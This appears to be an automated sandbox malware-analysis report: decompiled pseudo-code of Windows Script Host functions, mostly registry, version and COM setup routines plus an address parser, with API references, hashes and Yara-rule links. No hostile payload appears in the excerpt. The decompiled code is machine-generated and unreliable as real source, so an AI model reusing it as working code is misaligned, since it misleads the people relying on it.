                                                        0x00b9414d
                                                        0x00b9410e
                                                        0x00b9410f
                                                        0x00b9413f
                                                        0x00b94141
                                                        0x00b94141
                                                        0x00b94131
                                                        0x00b94131
                                                        0x00000000
                                                        0x00b94131
                                                        0x00b94112
                                                        0x00b94125
                                                        0x00b94127
                                                        0x00b94127
                                                        0x00000000
                                                        0x00b94125
                                                        0x00b94114
                                                        0x00000000
                                                        0x00b94114

                                                        APIs
                                                        • memset.MSVCRT ref: 00B940B0
                                                        • GetVersionExW.KERNEL32(?,?,00000008,00B934B3), ref: 00B940CB
                                                        • GetVersionExW.KERNEL32(?,?,00000008,00B934B3), ref: 00B940E2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: Version$memset
                                                        • String ID: Z
                                                        • API String ID: 3607446104-1505515367
                                                        • Opcode ID: 14f66d7d20563e15f11874bad0c63b1e5729db16a0b84fb852fbf7cde234bf5a
                                                        • Instruction ID: 6dc74863cb488020848fe7632c55f5c5dcd1360a37a08cf5911468ea984750b2
                                                        • Opcode Fuzzy Hash: 14f66d7d20563e15f11874bad0c63b1e5729db16a0b84fb852fbf7cde234bf5a
                                                        • Instruction Fuzzy Hash: 74314B709242288ADF658B04ED49BE97EF8FB64304F1401EAC109A3352DB749AC68F96
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B8F96C, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00B8F96C(void* __eax, void* __ebx, void* __ecx, void* __edx, char* _a4, intOrPtr _a8) {
				void* _v8;
				void* __edi;
				signed int _t13;
				signed int _t17;
				signed int _t19;
				void* _t23;
				void* _t27;
				void* _t29;
				signed int _t32;

				_t27 = __edx;
				_t23 = __ebx;
				_t29 = __eax;
				_t32 = 0;
				_t13 = RegOpenKeyExA(0x80000000, _a4, 0, 0x2001f,  &_v8);
				if(_t13 != 0) {
					if(_a8 == 0) {
						if(_t13 > 0) {
							_t13 = _t13 & 0x0000ffff | 0x80070000;
						}
						_t32 = _t13;
					}
					L13:
					return _t32;
				}
				if(_a8 == 0) {
					_t17 = 1;
				} else {
					_t17 = 0 | E00B8F7CB(_v8, "ScriptEngine") >= 0x00000000;
				}
				if(_t17 != 0) {
					_t19 = E00B8F764(_v8, "Shell", 0xb89b44, _t29);
					_t32 = _t19;
					if(_t32 < 0 && (_t19 & 0x0000ffff) == 5) {
						_t32 = E00B8F8BF(_t23, _t27, _t29, _a4);
					}
				}
				RegCloseKey(_v8);
				goto L13;
			}












                                                        0x00b8f96c
                                                        0x00b8f96c
                                                        0x00b8f974
                                                        0x00b8f97f
                                                        0x00b8f98a
                                                        0x00b8f992
                                                        0x00b8f9f3
                                                        0x00b8f9f7
                                                        0x00b8f9fe
                                                        0x00b8f9fe
                                                        0x00b8fa03
                                                        0x00b8fa03
                                                        0x00b8fa05
                                                        0x00b8fa0a
                                                        0x00b8fa0a
                                                        0x00b8f997
                                                        0x00b8f9b3
                                                        0x00b8f999
                                                        0x00b8f9ad
                                                        0x00b8f9ad
                                                        0x00b8f9b6
                                                        0x00b8f9c6
                                                        0x00b8f9cb
                                                        0x00b8f9cf
                                                        0x00b8f9e3
                                                        0x00b8f9e3
                                                        0x00b8f9cf
                                                        0x00b8f9e8
                                                        0x00000000

                                                        APIs
                                                        • RegOpenKeyExA.ADVAPI32(80000000,?,00000000,0002001F,00000000), ref: 00B8F98A
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00B8F9E8
                                                          • Part of subcall function 00B8F7CB: RegOpenKeyExA.ADVAPI32(?,00B8FB79,00000000,00020019,00B8FB79), ref: 00B8F7E2
                                                          • Part of subcall function 00B8F7CB: RegCloseKey.ADVAPI32(00B8FB79), ref: 00B8F7F1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: CloseOpen
                                                        • String ID: ScriptEngine$Shell
                                                        • API String ID: 47109696-1851718235
                                                        • Opcode ID: 368c78571e7cfa15002d917f17e3df67d2f7af03e9864448124bc149d2c3930a
                                                        • Instruction ID: 697ba8aa9e9038a91ff7228b83220c4968b4dd37bb020a1b19f8c337c495567d
                                                        • Opcode Fuzzy Hash: 368c78571e7cfa15002d917f17e3df67d2f7af03e9864448124bc149d2c3930a
                                                        • Instruction Fuzzy Hash: 3901C432A00117FB9F217A65DC06ABA7AE9DF517A0B1541B5F805E2170EA70CD10E780
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B83D3E, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 59registryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 95%
                                                        			E00B83D3E(signed int __ecx, void* __eflags, void* _a4) {
				signed int _v8;
				void* _t16;
				signed int _t19;
				signed int _t26;
				void* _t28;
				void* _t30;
				signed int* _t33;

				_t26 = __ecx;
				_push(__ecx);
				_t33 = __ecx;
				_t16 = E00B83B78(__ecx, _t28, _a4, L"Software\\Microsoft\\Windows Script Host\\Settings", 0x20019,  &_a4);
				if(_t16 < 0) {
					L9:
					return _t16;
				}
				_t30 = E00B8413D(_t28, _a4, L"Timeout",  &_v8);
				if(_t30 >= 0) {
					_t19 = _v8;
					_t33[1] = _t26 & 0xffffff00 | _t19 != 0x00000000;
					 *_t33 = _t19;
					if(_t19 == 0) {
						L4:
						 *_t33 =  *_t33 & 0x00000000;
						L5:
						_t30 = E00B832BE(_t28, _a4, L"DisplayLogo",  &(_t33[1]));
						if(_t30 >= 0) {
							_t33[1] = 1;
						} else {
							if(_t30 == 0x80070002) {
								_t33[1] = 0;
								_t30 = 0;
							}
						}
						L8:
						RegCloseKey(_a4);
						_t16 = _t30;
						goto L9;
					}
					goto L5;
				}
				if(_t30 != 0x80070002) {
					goto L8;
				} else {
					_t33[1] = 0;
					goto L4;
				}
			}










                                                        0x00b83d3e
                                                        0x00b83d43
                                                        0x00b83d56
                                                        0x00b83d58
                                                        0x00b83d5f
                                                        0x00b83dbc
                                                        0x00b83dbe
                                                        0x00b83dbe
                                                        0x00b83d74
                                                        0x00b83d7d
                                                        0x00b87d4e
                                                        0x00b87d56
                                                        0x00b87d59
                                                        0x00b87d5d
                                                        0x00b83d8b
                                                        0x00b83d8b
                                                        0x00b83d8e
                                                        0x00b83d9f
                                                        0x00b83da3
                                                        0x00b83dc1
                                                        0x00b83da5
                                                        0x00b83da7
                                                        0x00b83da9
                                                        0x00b83dad
                                                        0x00b83dad
                                                        0x00b83da7
                                                        0x00b83daf
                                                        0x00b83db2
                                                        0x00b83db8
                                                        0x00000000
                                                        0x00b83dbb
                                                        0x00000000
                                                        0x00b87d63
                                                        0x00b83d85
                                                        0x00000000
                                                        0x00b83d87
                                                        0x00b83d87
                                                        0x00000000
                                                        0x00b83d87

                                                        APIs
                                                          • Part of subcall function 00B83B78: RegCreateKeyExW.ADVAPI32(00B82218,00B82238,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00B83BAB
                                                          • Part of subcall function 00B8413D: RegQueryValueExW.ADVAPI32(00000004,00B82238,00000000,00B82218,00B82218,00000004), ref: 00B84179
                                                        • RegCloseKey.ADVAPI32(00B82218), ref: 00B83DB2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: CloseCreateQueryValue
                                                        • String ID: DisplayLogo$Software\Microsoft\Windows Script Host\Settings$Timeout
                                                        • API String ID: 4083198587-512383463
                                                        • Opcode ID: 6e8715d29ce29f35a9974d213ec8560cf0b7b48647f9c790637d6c7b5daf6203
                                                        • Instruction ID: 127f096f2971dcec6b33d6991e72bc2998f66cc55b74ddfd2ff4aec7121d9842
                                                        • Opcode Fuzzy Hash: 6e8715d29ce29f35a9974d213ec8560cf0b7b48647f9c790637d6c7b5daf6203
                                                        • Instruction Fuzzy Hash: 72110276200645BBDB21BA18CC40BAA7ADDDFA0F54F1044B8F845C7271EA30DA41C750
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B8F066, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39registryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00B8F066(intOrPtr* __ecx, void* __edx, void* __eflags, void* _a4) {
				void* _t9;
				intOrPtr _t10;
				void* _t19;
				intOrPtr* _t21;

				_t17 = __edx;
				_t16 = __ecx;
				_t21 = __ecx;
				_t9 = E00B83B78(__ecx, __edx, _a4, L"Software\\Microsoft\\Windows Script Host\\Settings", 0x20006,  &_a4);
				if(_t9 >= 0) {
					if( *((char*)(__ecx + 4)) == 0) {
						_t10 = 0;
					} else {
						_t10 =  *__ecx;
					}
					_t19 = E00B93671(_t16, _t17, _a4, L"Timeout", _t10);
					if(_t19 >= 0) {
						_t19 = E00B93728(_a4, L"DisplayLogo",  *(_t21 + 6) & 0x000000ff);
					}
					RegCloseKey(_a4);
					return _t19;
				}
				return _t9;
			}







                                                        0x00b8f066
                                                        0x00b8f066
                                                        0x00b8f07d
                                                        0x00b8f07f
                                                        0x00b8f086
                                                        0x00b8f08c
                                                        0x00b8f092
                                                        0x00b8f08e
                                                        0x00b8f08e
                                                        0x00b8f08e
                                                        0x00b8f0a3
                                                        0x00b8f0a7
                                                        0x00b8f0bb
                                                        0x00b8f0bb
                                                        0x00b8f0c0
                                                        0x00000000
                                                        0x00b8f0c8
                                                        0x00b8f0cb

                                                        APIs
                                                          • Part of subcall function 00B83B78: RegCreateKeyExW.ADVAPI32(00B82218,00B82238,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00B83BAB
                                                        • RegCloseKey.ADVAPI32(00B82218), ref: 00B8F0C0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: CloseCreate
                                                        • String ID: DisplayLogo$Software\Microsoft\Windows Script Host\Settings$Timeout
                                                        • API String ID: 2932200918-512383463
                                                        • Opcode ID: 8f0553595ae668aa8a13f2153f4b967609402970aeb97e4dee9e03e5c4279883
                                                        • Instruction ID: f9d5c4e7152499647f90bbddf7c3a0dfb1150e0c9c3b45f521d635abb4a8ee56
                                                        • Opcode Fuzzy Hash: 8f0553595ae668aa8a13f2153f4b967609402970aeb97e4dee9e03e5c4279883
                                                        • Instruction Fuzzy Hash: BDF06D762002557EDB113E69DC01DBABAEADB81F90B0444B5BD45C6271EA71CE51C7A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B8FBD9, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 38COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 87%
                                                        			E00B8FBD9(struct HWND__* _a4) {
				signed int _v8;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				signed int _t12;
				void* _t16;
				void* _t19;
				void* _t23;
				void* _t24;
				void* _t25;
				signed int _t26;

				_t12 =  *0xb97004; // 0xbb40e64e
				_v8 = _t12 ^ _t26;
				if(GetClassNameA(_a4,  &_v16, 5) != 3 || _v13 != 0 || _v16 != 0x49 && _v16 != 0x69 || _v15 != 0x4d && _v15 != 0x6d || _v14 != 0x45 && _v14 != 0x65) {
					_t16 = 0;
				} else {
					_t16 = 1;
				}
				return E00B81335(_t16, _t19, _v8 ^ _t26, _t23, _t24, _t25);
			}















                                                        0x00b8fbe1
                                                        0x00b8fbe8
                                                        0x00b8fbfe
                                                        0x00b8fc2f
                                                        0x00b8fc2a
                                                        0x00b8fc2c
                                                        0x00b8fc2c
                                                        0x00b8fc3c

                                                        APIs
                                                        • GetClassNameA.USER32(?,?,00000005), ref: 00B8FBF5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: ClassName
                                                        • String ID: e$i$m
                                                        • API String ID: 1191326365-1028471717
                                                        • Opcode ID: ddf63a0e8c5e757da91ff11c214d9a52d10733a8507c861fa3f0af908185705d
                                                        • Instruction ID: ac0e4e597235632a9ce5f21221abc896b7c2fa0ab99aceecdd3cdb655d139c0c
                                                        • Opcode Fuzzy Hash: ddf63a0e8c5e757da91ff11c214d9a52d10733a8507c861fa3f0af908185705d
                                                        • Instruction Fuzzy Hash: 590181B0E041CE7EEF20E7B888087BDBFE5CB15314F0488EAD945920A5DA785B94CB09
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0230FCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E0230FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E0230EE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E0230EE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E0230685D(_t167, 4) == 0) {
								if(E0230685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E0230685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E0230685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E022E8980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E022DDFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E0230EE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E0230EE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

























                                                        0x0230fcd1
                                                        0x0230fcd6
                                                        0x0230fcd9
                                                        0x0230fcdc
                                                        0x0230fcdf
                                                        0x0230fce2
                                                        0x0230fce5
                                                        0x0230fce8
                                                        0x0230fceb
                                                        0x0230fced
                                                        0x0230fced
                                                        0x0230fcf3
                                                        0x00000000
                                                        0x00000000
                                                        0x0230fcfc
                                                        0x0230fcfe
                                                        0x0230fdc1
                                                        0x0233ecbd
                                                        0x00000000
                                                        0x0233eccc
                                                        0x0233eccc
                                                        0x0233ecd2
                                                        0x00000000
                                                        0x00000000
                                                        0x0233ecdf
                                                        0x0233ece0
                                                        0x0233ece4
                                                        0x0233eceb
                                                        0x0233ecee
                                                        0x0233eca8
                                                        0x0233eca8
                                                        0x0233ecaa
                                                        0x0230fd76
                                                        0x0230fd79
                                                        0x0230fdb4
                                                        0x0230fdb5
                                                        0x0230fdb6
                                                        0x00000000
                                                        0x0230fdb6
                                                        0x0230fd7e
                                                        0x0233ecfc
                                                        0x0230fe2f
                                                        0x00000000
                                                        0x0230fe2f
                                                        0x0233ed08
                                                        0x0233ed0f
                                                        0x0233ed17
                                                        0x0233ed1b
                                                        0x00000000
                                                        0x0233ed1b
                                                        0x0230fd88
                                                        0x00000000
                                                        0x00000000
                                                        0x0230fd94
                                                        0x0230fd99
                                                        0x0230fda1
                                                        0x00000000
                                                        0x00000000
                                                        0x0230fdb0
                                                        0x00000000
                                                        0x0230fdb0
                                                        0x0233ecbd
                                                        0x0230fdc7
                                                        0x0230fdcb
                                                        0x00000000
                                                        0x0230fdd7
                                                        0x0230fde3
                                                        0x0230fe06
                                                        0x02321fe7
                                                        0x00000000
                                                        0x00000000
                                                        0x02321fef
                                                        0x02321ff0
                                                        0x02321ff4
                                                        0x02321ff7
                                                        0x02321ffa
                                                        0x02321ffd
                                                        0x02322000
                                                        0x00000000
                                                        0x00000000
                                                        0x0233ecf1
                                                        0x00000000
                                                        0x0233ecf1
                                                        0x00000000
                                                        0x0230fe06
                                                        0x0230fde8
                                                        0x0230fdec
                                                        0x0230fdef
                                                        0x0230fdf2
                                                        0x00000000
                                                        0x0230fdf2
                                                        0x0230fdcb
                                                        0x0230fd04
                                                        0x0230fd05
                                                        0x0233ec67
                                                        0x00000000
                                                        0x00000000
                                                        0x0233ec6f
                                                        0x00000000
                                                        0x0233ec6f
                                                        0x0230fd13
                                                        0x0230fd3c
                                                        0x0230fd40
                                                        0x0233ec75
                                                        0x0233ec7a
                                                        0x00000000
                                                        0x0233ec8a
                                                        0x0233ec8a
                                                        0x0233ec90
                                                        0x0233ecb2
                                                        0x0230fd73
                                                        0x0230fd73
                                                        0x00000000
                                                        0x0230fd73
                                                        0x0233ec95
                                                        0x00000000
                                                        0x00000000
                                                        0x0233eca1
                                                        0x0233eca4
                                                        0x0233eca5
                                                        0x00000000
                                                        0x0233eca5
                                                        0x0233ec7a
                                                        0x0230fd4a
                                                        0x00000000
                                                        0x0230fd6e
                                                        0x0230fd6e
                                                        0x0230fd71
                                                        0x00000000
                                                        0x0230fd71
                                                        0x0230fd4a
                                                        0x0230fd21
                                                        0x0231a3a1
                                                        0x00000000
                                                        0x0231a3a1
                                                        0x0230fd36
                                                        0x0232200b
                                                        0x02322012
                                                        0x00000000
                                                        0x00000000
                                                        0x02322018
                                                        0x00000000
                                                        0x02322018
                                                        0x00000000
                                                        0x0230fd36
                                                        0x0230fe0f
                                                        0x0230fe16
                                                        0x0231a3ad
                                                        0x00000000
                                                        0x00000000
                                                        0x0231a3b3
                                                        0x0231a3b3
                                                        0x0230fe1f
                                                        0x0233ed25
                                                        0x0233ed86
                                                        0x00000000
                                                        0x00000000
                                                        0x0233ed91
                                                        0x0233ed95
                                                        0x0233ed95
                                                        0x0233ed9a
                                                        0x0233edad
                                                        0x0233edb3
                                                        0x0233edba
                                                        0x0233edc4
                                                        0x0233edc9
                                                        0x00000000
                                                        0x0233edcc
                                                        0x0233ed2a
                                                        0x0233ed55
                                                        0x00000000
                                                        0x00000000
                                                        0x0233ed61
                                                        0x0233ed66
                                                        0x0233ed6e
                                                        0x00000000
                                                        0x00000000
                                                        0x0233ed7d
                                                        0x00000000
                                                        0x0233ed7d
                                                        0x0233ed30
                                                        0x00000000
                                                        0x00000000
                                                        0x0233ed3c
                                                        0x0233ed43
                                                        0x0233ed4b
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.688194486.00000000022C0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: true
                                                        • Associated: 0000000D.00000002.688187161.00000000022B0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688305042.00000000023A0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688312609.00000000023B0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688320304.00000000023B4000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688327822.00000000023B7000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688335301.00000000023C0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688370384.0000000002420000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: __fassign
                                                        • String ID:
                                                        • API String ID: 3965848254-0
                                                        • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                        • Instruction ID: d952ac134e281d1fd2f6b5d650f5676bd4eb65147416502e498443aeb3f5adc3
                                                        • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                        • Instruction Fuzzy Hash: 14919E31D0020AEFDF35CF98C8957AEB7B4FF45709F20846AD415A6592EB308B81CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B83DCC, Relevance: 6.1, APIs: 4, Instructions: 128memoryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 59%
                                                        			E00B83DCC(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				signed int _v8;
				char _v528;
				void* _v532;
				void* _v536;
				intOrPtr _v540;
				intOrPtr* _v544;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;
				intOrPtr* _t38;
				intOrPtr _t45;
				intOrPtr _t49;
				intOrPtr _t50;
				char* _t53;
				char* _t54;
				char* _t56;
				char* _t57;
				intOrPtr* _t58;
				char* _t59;
				intOrPtr* _t62;
				intOrPtr _t73;
				intOrPtr* _t75;
				intOrPtr* _t76;
				intOrPtr* _t77;
				signed int _t78;

				_t72 = __edx;
				_t33 =  *0xb97004; // 0xbb40e64e
				_v8 = _t33 ^ _t78;
				_t73 = _a4;
				_v540 = _a12;
				_t36 = _a16;
				_t62 = 0;
				_push(0x44);
				_v544 = _t36;
				_v536 = 0;
				_v532 = 0;
				L00B82877();
				if(_t36 == 0) {
					_t77 = 0;
				} else {
					_t77 = E00B848AC(_t36, 0);
				}
				if(_t77 == _t62) {
					L19:
					_t74 = 0x8007000e;
					goto L12;
				} else {
					_t62 = _t73 + 0x2c;
					 *((intOrPtr*)(_t77 + 0x40)) = _t73;
					_t75 = __imp__#2;
					_t45 =  *_t75(_t62);
					 *((intOrPtr*)(_t77 + 0x28)) = _t45;
					if(_t45 == 0) {
						goto L19;
					}
					E00B83BEA(_t62,  &_v528, 0x104);
					_t49 =  *_t75( &_v528);
					 *((intOrPtr*)(_t77 + 0x2c)) = _t49;
					if(_t49 == 0) {
						goto L19;
					}
					_t50 =  *0xb9702c; // 0x0
					_t15 = _t77 + 0x24; // 0x24
					_t76 = _t15;
					E00B83A91(_t72, _t76, _t50 + 1);
					if( *_t76 == 0) {
						goto L19;
					}
					_t53 =  &_v536;
					__imp__#161(_t62, _t53);
					_t74 = _t53;
					if(_t53 >= 0) {
						_t18 = _t77 + 8; // 0x8
						_t54 = E00B83F8A(_t18, _v536);
						_t74 = _t54;
						if(_t54 >= 0) {
							_t56 = E00B84689( &_v532, _t62, _a8, _v540,  &_v532);
							_t74 = _t56;
							if(_t56 >= 0) {
								_t57 = E00B83F49(_v532, _v536);
								_t74 = _t57;
								if(_t57 >= 0) {
									_t58 = _v532;
									_t25 = _t77 + 0x30; // 0x30
									_t72 = _t25;
									_t59 =  *((intOrPtr*)( *_t58))(_t58, 0xb829e8, _t25);
									_t74 = _t59;
									if(_t59 >= 0) {
										 *_v544 = _t77;
										_t77 = 0;
										_t74 = 0;
									}
								}
							}
						}
					}
					L12:
					_t37 = _v536;
					if(_t37 != 0) {
						 *((intOrPtr*)( *_t37 + 8))(_t37);
					}
					_t38 = _v532;
					if(_t38 != 0) {
						 *((intOrPtr*)( *_t38 + 8))(_t38);
					}
					if(_t77 != 0) {
						 *((intOrPtr*)( *_t77 + 8))(_t77);
					}
					return E00B81335(_t74, _t62, _v8 ^ _t78, _t72, _t74, _t77);
				}
			}































                                                        0x00b83dcc
                                                        0x00b83dd7
                                                        0x00b83dde
                                                        0x00b83de7
                                                        0x00b83dea
                                                        0x00b83df0
                                                        0x00b83df3
                                                        0x00b83df5
                                                        0x00b83df7
                                                        0x00b83dfd
                                                        0x00b83e03
                                                        0x00b83e09
                                                        0x00b83e11
                                                        0x00b83f3d
                                                        0x00b83e17
                                                        0x00b83e1f
                                                        0x00b83e1f
                                                        0x00b83e23
                                                        0x00b88e9d
                                                        0x00b88e9d
                                                        0x00000000
                                                        0x00b83e29
                                                        0x00b83e29
                                                        0x00b83e2c
                                                        0x00b83e2f
                                                        0x00b83e36
                                                        0x00b83e38
                                                        0x00b83e3d
                                                        0x00000000
                                                        0x00000000
                                                        0x00b83e50
                                                        0x00b83e5c
                                                        0x00b83e5e
                                                        0x00b83e63
                                                        0x00000000
                                                        0x00000000
                                                        0x00b83e69
                                                        0x00b83e70
                                                        0x00b83e70
                                                        0x00b83e74
                                                        0x00b83e7c
                                                        0x00000000
                                                        0x00000000
                                                        0x00b83e82
                                                        0x00b83e8a
                                                        0x00b83e90
                                                        0x00b83e94
                                                        0x00b83e9c
                                                        0x00b83e9f
                                                        0x00b83ea4
                                                        0x00b83ea8
                                                        0x00b83eba
                                                        0x00b83ebf
                                                        0x00b83ec3
                                                        0x00b83ed1
                                                        0x00b83ed6
                                                        0x00b83eda
                                                        0x00b83edc
                                                        0x00b83ee4
                                                        0x00b83ee4
                                                        0x00b83eee
                                                        0x00b83ef0
                                                        0x00b83ef4
                                                        0x00b83efc
                                                        0x00b83efe
                                                        0x00b83f00
                                                        0x00b83f00
                                                        0x00b83ef4
                                                        0x00b83eda
                                                        0x00b83ec3
                                                        0x00b83ea8
                                                        0x00b83f02
                                                        0x00b83f02
                                                        0x00b83f0a
                                                        0x00b83f0f
                                                        0x00b83f0f
                                                        0x00b83f12
                                                        0x00b83f1a
                                                        0x00b83f1f
                                                        0x00b83f1f
                                                        0x00b83f24
                                                        0x00b88eaa
                                                        0x00b88eaa
                                                        0x00b83f3a
                                                        0x00b83f3a

                                                        APIs
                                                        • ??2@YAPAXI@Z.MSVCRT ref: 00B83E09
                                                        • SysAllocString.OLEAUT32(?), ref: 00B83E36
                                                          • Part of subcall function 00B83BEA: memcpy.MSVCRT ref: 00B83C49
                                                        • SysAllocString.OLEAUT32(?), ref: 00B83E5C
                                                          • Part of subcall function 00B83A91: LoadStringW.USER32(?,?,00000800,?), ref: 00B83ADB
                                                          • Part of subcall function 00B83A91: SysAllocString.OLEAUT32(?), ref: 00B83AF2
                                                        • LoadTypeLib.OLEAUT32(?,?), ref: 00B83E8A
                                                          • Part of subcall function 00B84689: ??2@YAPAXI@Z.MSVCRT ref: 00B84695
                                                          • Part of subcall function 00B84689: SafeArrayCreate.OLEAUT32(0000000C,00000001,?), ref: 00B846C6
                                                          • Part of subcall function 00B84689: SysAllocString.OLEAUT32(?), ref: 00B846F0
                                                          • Part of subcall function 00B84689: SafeArrayPutElement.OLEAUT32(?,00000000,?), ref: 00B84708
